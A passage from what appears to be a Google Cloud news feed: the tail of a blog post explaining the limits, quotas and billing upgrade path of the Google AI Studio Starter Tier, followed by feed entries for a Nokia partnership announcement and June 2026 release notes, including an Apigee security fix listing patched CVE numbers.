&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 230.391px;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$300 Welcome credit&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/free/docs/free-cloud-features#free-tier" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Free Tier&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Other product-specific free trials&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;90-day exploration with no risk of being billed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;What we need from you&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A Google account &lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Accept &lt;a href="https://cloud.google.com/terms/starter-tier-additional-terms-of-service" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Starter Tier Additional Terms of Service&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Accept Google Cloud Terms of Service&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;A form of payment for anti-fraud purposes&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Time limit&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;None&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;90 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Project control&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google-managed&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Full control&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Console experience&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Simplified&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Full&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Best for&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Prototyping from AI Studio&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluating the full Google Cloud platform&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;What happens when you are ready for more?&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upgrade to a paid account by adding a payment method. If you’ve never had a billing account before, you will receive the $300 Welcome credit and access to the Free Tier.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You will then be billed for usage that the Free Tier and $300 credit cannot cover.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upgrade to a paid billing account to keep your existing project, remaining credits, and Free Tier and full platform access.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You will then be billed for usage that the Free Tier and any remaining credit cannot cover.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Starter Tier is best for AI Studio prototyping. Choose the Free Trial If you need &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or the 90-day period to evaluate GCP broadly with no risk of being billed. Both paths allow you to seamlessly upgrade to a paid account for the full experience whenever you are ready.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;How to plan for limits&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Starter Tier is generous for prototyping, but it does have boundaries. Knowing them upfront saves you from unpleasant surprises.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Two-app cap.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can deploy a maximum of two applications. Note that if you want to replace one of your active applications, you should deploy over or overwrite the existing app slot in Google AI Studio rather than attempting to delete the service manually in the Cloud Console.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Single region.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; All resources in your Starter Tier project are pinned to one region, chosen whenever the first Starter Tier service is provisioned. For example, if a Firestore database is provisioned before deploying to Cloud Run, then the region is chosen at that time.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Locked API surface.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can't enable additional Google Cloud APIs (BigQuery, Pub/Sub, Cloud Functions, etc.) in a Starter Tier project. If you need them, you'll need to upgrade.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Ephemeral filesystem.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because your published Google AI Studio app runs inside a serverless Cloud Run container, it inherits a temporary filesystem. Any files you write directly to disk (like uploaded images, generated PDFs, or local &lt;/span&gt;&lt;a href="https://www.sqlite.org" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SQLite&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; databases) will vanish when the container scales to zero or gets redeployed. Since Google AI Studio redeploys your container with each prompt iteration, this happens frequently. Store persistent data in Firestore or Cloud SQL for PostgreSQL.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Firestore shared quota.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; All Firestore databases created by the Google AI Studio agent share a single shared-quota group. In Google Cloud, a quota represents a usage limit or daily budget to protect the project and prevent abuse. It is not a guarantee of reserved server capacity.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 100%; height: 134.39px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Quota Metric&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Starter Tier Maximum Limit&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Total Stored Data&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;1 GiB total&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Network Egress&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;10 GiB per month&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Write Operations&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;40,000 writes per day&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Read Operations&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;50,000 reads per day&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Real-Time Updates&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;50,000 updates per day&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If any database in the group exhausts a daily limit, all databases in the group pause until roughly midnight Pacific Time. Firebase Authentication usage is metered separately, so a spike in logins won't eat into your database quota.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud SQL share quota:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You are limited to building a maximum of 2 apps with Cloud SQL. AI Studio agent will automatically fallback to Firestore if the Cloud SQL quota is exceeded. You can get more quota by growing out of the sandbox.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Growing out of the sandbox&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The best part of the Starter Tier is how you upgrade from it. There's no migration, no data export, no DNS cutover. When you're ready to scale, you upgrade in place.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image2_O2DyF4k.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From the &lt;/span&gt;&lt;a href="https://aistudio.google.com/projects" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Projects page in Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, click "Set up billing." You'll create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/billing/docs/concepts" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Billing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; account, enter a payment method, and accept the standard Google Cloud Terms of Service. &lt;span style="vertical-align: baseline;"&gt;If you are eligible&lt;/span&gt;, you will automatically receive the $300 Welcome credits, which will offset your usage costs during the trial period. The upgrade happens with zero downtime: your Cloud Run services keep running, your databases keep their data, and your &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.run.app&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; URLs don't change.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;After upgrading, you get full IAM control, the ability to enable any Google Cloud API, and access to all regions and scaling options. The following cost safeguards are recommended:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set a budget alert:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Go to the Google Cloud Billing console and set up a budget alert (e.g., at $10) to notify you if usage exceeds your expectations.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set a Cloud Run max instance cap:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; In the Starter Tier, Google pins your maximum container instances to 1. Once you upgrade, configure an instance limit (e.g., &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--max-instances 5&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to prevent unexpected scaling charges from sudden traffic spikes.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Configure API quotas:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set caps on API calls (such as the Gemini API or Firestore reads/writes) to enforce a hard ceiling on usage.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;One caveat: Firestore databases created by the Google AI Studio agent stay in the shared-quota group even after you add billing. If you want to get more usage quota for your database, then you need to go to the &lt;/span&gt;&lt;a href="https://console.firebase.google.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, navigate to your Firestore database, and click "Upgrade database". This will remove the instance from the shared-quota group and put it on standard billing, although standard Firestore Free Tier limits still apply before you are charged.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The continuity across paths makes this process smooth. You can start with a prototype on the Starter Tier, iterate on it for weeks, and then flip it to a production-grade Google Cloud project when it's ready, without rebuilding anything.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Got questions about the Starter Tier or want to share with &lt;/span&gt;&lt;a href="https://x.com/kweinmeister" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;me&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; what you've built with it? You can also share your thoughts with the community on &lt;/span&gt;&lt;a href="https://www.reddit.com/r/googlecloud/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;r/GoogleCloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://www.reddit.com/r/Firebase/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;r/Firebase&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; subreddits.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/the-starter-tier-for-google-ai-studio-explained" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-22T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-06-22-Nokia-and-Google-Cloud-Partner-to-Embed-AI-Agents,-Built-with-Googles-Gemini-Models,-Into-Nokias-Autonomous-Network-Product-Suite</id>
    <title>Nokia and Google Cloud Partner to Embed AI Agents, Built with Google's Gemini Models, Into Nokia's Autonomous Network Product Suite</title>
    <updated>2026-06-22T12:00:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-06-22-Nokia-and-Google-Cloud-Partner-to-Embed-AI-Agents,-Built-with-Googles-Gemini-Models,-Into-Nokias-Autonomous-Network-Product-Suite" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-22T12:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-22-Nokia-and-Google-Cloud-Partner-to-Embed-AI-Agents,-Built-with-Googles-Gemini-Models,-Into-Nokias-Autonomous-Network-Product-Suite</id>
    <title>Nokia and Google Cloud Partner to Embed AI Agents, Built with Google's Gemini Models, Into Nokia's Autonomous Network Product Suite</title>
    <updated>2026-06-22T12:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-22-Nokia-and-Google-Cloud-Partner-to-Embed-AI-Agents,-Built-with-Googles-Gemini-Models,-Into-Nokias-Autonomous-Network-Product-Suite" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-22T12:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#June_22_2026</id>
    <title>Workspace Release Notes — June 22, 2026</title>
    <updated>2026-06-22T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google Apps Script&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; Apps Script is generally available as a core service in Google Workspace, giving it the enterprise-grade data protection, robust administrative controls, and standard technical support that safeguard other core services.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#June_22_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-06-22T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_22_2026</id>
    <title>Cloud Release Notes — June 22, 2026</title>
    <updated>2026-06-22T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;AI Hypercomputer&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: RoCE VPC networks for VM instances support assigning alias IP
ranges to &lt;code&gt;MRDMA&lt;/code&gt; vNICs. For more information about these features, see the
following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/rdma-network-profiles"&gt;RDMA network profiles&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/alias-ip"&gt;Alias IP ranges&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Apigee X&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;On June 22nd, 2026, we released an updated version of Apigee (1-17-0-apigee-10).&lt;/p&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;span&gt; Rollouts of this release began today and may take four or more business days to be completed across all Google Cloud zones. Your instances may not have the features and fixes available until the rollout is complete.&lt;/span&gt;&lt;/aside&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bug ID&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;519996459&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Security fix for Apigee.&lt;/strong&gt; Upgraded the Apigee ingress gateway to patch the following vulnerabilities: &lt;p&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-27143"&gt;CVE-2026-27143&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2019-14993"&gt;CVE-2019-14993&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2021-39155"&gt;CVE-2021-39155&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2021-39156"&gt;CVE-2021-39156&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2022-23635"&gt;CVE-2022-23635&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-27140"&gt;CVE-2026-27140&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-27144"&gt;CVE-2026-27144&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-29181"&gt;CVE-2026-29181&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-32280"&gt;CVE-2026-32280&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-32281"&gt;CVE-2026-32281&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-32283"&gt;CVE-2026-32283&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-33811"&gt;CVE-2026-33811&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-33814"&gt;CVE-2026-33814&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-34986"&gt;CVE-2026-34986&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-35469"&gt;CVE-2026-35469&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39820"&gt;CVE-2026-39820&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39836"&gt;CVE-2026-39836&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39883"&gt;CVE-2026-39883&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-4046"&gt;CVE-2026-4046&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42499"&gt;CVE-2026-42499&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42501"&gt;CVE-2026-42501&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42504"&gt;CVE-2026-42504&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2022-31045"&gt;CVE-2022-31045&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-27145"&gt;CVE-2026-27145&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-32282"&gt;CVE-2026-32282&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-32288"&gt;CVE-2026-32288&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a 